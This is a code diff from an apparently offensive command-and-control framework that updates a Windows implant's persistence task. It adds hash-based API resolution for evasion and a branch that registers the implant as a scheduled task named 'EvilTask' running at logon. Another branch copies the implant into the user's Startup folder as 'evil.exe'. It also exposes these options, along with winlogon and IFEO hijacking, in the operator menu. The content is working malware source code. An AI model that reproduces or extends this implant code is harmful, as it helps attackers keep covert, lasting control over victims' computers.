updated persist task

payload/win/implant/include/core/procs.hpp

@@ -110,6 +110,7 @@
 #define HASH_FUNC_GETCOMPUTERNAMEW              0x75f9dd70
 #define HASH_FUNC_GETCOMPUTERNAMEEXW            0xc154e2bd
 #define HASH_FUNC_GETENVIRONMENTSTRINGSW        0x6f39aea7
+#define HASH_FUNC_GETEXITCODEPROCESS            0xd3934823
 #define HASH_FUNC_GETFOREGROUNDWINDOW           0x41b94f14
 #define HASH_FUNC_GETLASTERROR                  0xf03e69b1
 #define HASH_FUNC_GETLOCALTIME                  0xdb736df7
@@ -381,6 +382,8 @@ namespace Procs
     typedef BOOL (WINAPI* LPPROC_GETCOMPUTERNAMEEXW)(COMPUTER_NAME_FORMAT NameType, LPWSTR lpBuffer, LPDWORD nSize);
     // GetEnvironmentStringsW
     typedef LPWCH (WINAPI* LPPROC_GETENVIRONMENTSTRINGSW)();
+    // GetExitCodeProcess
+    typedef BOOL (WINAPI* LPPROC_GETEXITCODEPROCESS)(HANDLE hProcess, LPDWORD lpExitCode);
     // GetForegroundWindow
     typedef HWND (WINAPI* LPPROC_GETFOREGROUNDWINDOW)();
     // GetLastError
@@ -652,6 +655,7 @@ namespace Procs
         LPPROC_GETCOMPUTERNAMEW             lpGetComputerNameW                  = nullptr;
         LPPROC_GETCOMPUTERNAMEEXW           lpGetComputerNameExW                = nullptr;
         LPPROC_GETENVIRONMENTSTRINGSW       lpGetEnvironmentStringsW            = nullptr;
+        LPPROC_GETEXITCODEPROCESS           lpGetExitCodeProcess                = nullptr;
         LPPROC_GETFOREGROUNDWINDOW          lpGetForegroundWindow               = nullptr;
         LPPROC_GETLASTERROR                 lpGetLastError                      = nullptr;
         LPPROC_GETLOCALTIME                 lpGetLocalTime                      = nullptr;

payload/win/implant/script/calc_hash_func.py

@@ -67,6 +67,10 @@
     "BCryptSetProperty",
     "CheckRemoteDebuggerPresent",
     "CloseHandle",
+    "CoCreateInstance",
+    "CoInitializeEx",
+    "CoInitializeSecurity",
+    "CoUninitialize",
     "CreateFileW",
     "CreatePipe",
     "CreateProcessW",
@@ -92,6 +96,7 @@
     "GetComputerNameW",
     "GetComputerNameExW",
     "GetEnvironmentStringsW",
+    "GetExitCodeProcess",
     "GetForegroundWindow",
     "GetLastError",
     "GetLocalTime",

payload/win/implant/src/core/procs.cpp

@@ -191,6 +191,8 @@ namespace Procs
         pProcs->lpGetComputerNameExW            = reinterpret_cast<LPPROC_GETCOMPUTERNAMEEXW>(pGetComputerNameExW);
         PVOID pGetEnvironmentStringsW           = GetProcAddressByHash(hKernel32, HASH_FUNC_GETENVIRONMENTSTRINGSW);
         pProcs->lpGetEnvironmentStringsW        = reinterpret_cast<LPPROC_GETENVIRONMENTSTRINGSW>(pGetEnvironmentStringsW);
+        PVOID pGetExitCodeProcess               = GetProcAddressByHash(hKernel32, HASH_FUNC_GETEXITCODEPROCESS);
+        pProcs->lpGetExitCodeProcess            = reinterpret_cast<LPPROC_GETEXITCODEPROCESS>(pGetExitCodeProcess);
         PVOID pGetLastError                     = GetProcAddressByHash(hKernel32, HASH_FUNC_GETLASTERROR);
         pProcs->lpGetLastError                  = reinterpret_cast<LPPROC_GETLASTERROR>(pGetLastError);
         PVOID pGetLocalTime                     = GetProcAddressByHash(hKernel32, HASH_FUNC_GETLOCALTIME);

payload/win/implant/src/core/task/persist.cpp

@@ -210,7 +210,92 @@ namespace Task
         }
         else if (wcscmp(wTechnique.c_str(), L"scheduled-task") == 0)
         {
-            return L"Error: Not implemented yet.";
+            std::wstring wResult = L"";
+            std::wstring wTaskName = L"EvilTask";
+            std::wstring wCommand = L"schtasks /create /tn \"" + wTaskName + L"\" /sc ONLOGON /tr \"" + std::wstring(lpSelfPath) + L"\"";
+
+            STARTUPINFO si;
+            PROCESS_INFORMATION pi;
+            RtlZeroMemory(&si, sizeof(si));
+            si.cb = sizeof(si);
+            RtlZeroMemory(&pi, sizeof(pi));
+
+            if (!pState->pProcs->lpCreateProcessW(
+                nullptr,
+                &wCommand[0],
+                nullptr,
+                nullptr,
+                FALSE,
+                0,
+                nullptr,
+                nullptr,
+                &si,
+                &pi
+            )) {
+                return L"Error: Failed to create process for schtasks.";
+            }
+
+            System::Handle::HandleWait(
+                pState->pProcs,
+                pi.hProcess,
+                FALSE,
+                nullptr
+            );
+
+            // Get exit code.
+            DWORD dwExitCode;
+            if (pState->pProcs->lpGetExitCodeProcess(pi.hProcess, &dwExitCode))
+            {
+                if (dwExitCode == 0)
+                {
+                    wResult = L"Success: Task \"" + wTaskName + L"\" registered successfully.";
+                }
+                else if (dwExitCode == 5)
+                {
+                    wResult = L"Error: Access Denied";
+                }
+                else
+                {
+                    wResult = L"Error: Failed to register the task.";
+                }
+            }
+            else
+            {
+                DWORD dwError = pState->pProcs->lpGetLastError();
+                if (dwError == ERROR_ACCESS_DENIED)
+                {
+                    wResult = L"Error: Access Denied";
+                }
+                else
+                {
+                    wResult = L"Error: Failed to register the task.";
+                }
+            }
+
+            System::Handle::HandleClose(pState->pProcs, pi.hProcess);
+            System::Handle::HandleClose(pState->pProcs, pi.hThread);
+
+            return wResult;
+        }
+        else if (wcscmp(wTechnique.c_str(), L"startup-folder") == 0)
+        {
+            // Get a destination path (startup folder + implant).
+            std::wstring wAppData = System::Env::EnvStringsGet(pState->pProcs, L"%APPDATA%");
+            std::wstring wFileName = L"evil.exe";
+            std::wstring wDest = wAppData + L"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" + wFileName;
+
+            Stdout::DisplayMessageBoxW(wDest.c_str(), L"startup-folder");
+
+            // Read the implant data
+            std::vector<BYTE> bytes = System::Fs::FileRead(pState->pProcs, std::wstring(lpSelfPath));
+
+            // Copy to startup folder.
+            if (!System::Fs::FileWrite(pState->pProcs, wDest, bytes))
+            {
+                return L"Error: Failed to copy the implant to a startup folder.";
+            }
+
+            return L"Success: Implant copied to the startup folder \"" + wDest + L"\" successfully.";
         }
         else if (wcscmp(wTechnique.c_str(), L"winlogon") == 0)
         {

pkg/common/parser/amtaskcommand.go

@@ -793,10 +793,9 @@ func (c *amTaskPersistCmd) Run(
 		"user-init-mpr-logon-script",
 		"default-file-extension-hijacking",
 		"ifeo",
-		// "scheduled-task",
+		"scheduled-task",
+		"startup-folder",
 		"winlogon",
-		// "netsh",
-		// "service",
 		"(cancel)",
 	}
 	res, err := stdin.Select("Technique", items)

pkg/common/parser/parser.go

@@ -83,9 +83,8 @@ type GrammarAgentMode struct {
 	Pe       amTaskPeCmd       `cmd:"" help:"Load and execute PE (Portable Executable) file." group:"TASK:"`
 	Persist  amTaskPersistCmd  `cmd:"" help:"Establish persistence for implant." group:"TASK:"`
 	// Pivot amTaskPivotCmd `cmd:"" help:"Manage pivoting" group:"TASK:"`
-	Procdump amTaskProcdumpCmd `cmd:"" help:"Dump process memory to a specified output file." group:"TASK:"`
-	Ps       amTaskPsCmd       `cmd:"" help:"Manage processes." group:"TASK:"`
-	// PsExec     amTaskPsExecCmd     `cmd:"Manage processes with psexec." help:"" group:"TASK:"`
+	Procdump   amTaskProcdumpCmd   `cmd:"" help:"Dump process memory to a specified output file." group:"TASK:"`
+	Ps         amTaskPsCmd         `cmd:"" help:"Manage processes." group:"TASK:"`
 	Pwd        amTaskPwdCmd        `cmd:"" help:"Print the current working directory." group:"TASK:"`
 	Reg        amTaskRegCmd        `cmd:"" help:"Manage registry." group:"TASK:"`
 	Rm         amTaskRmCmd         `cmd:"" help:"Remove file or directory." group:"TASK:"`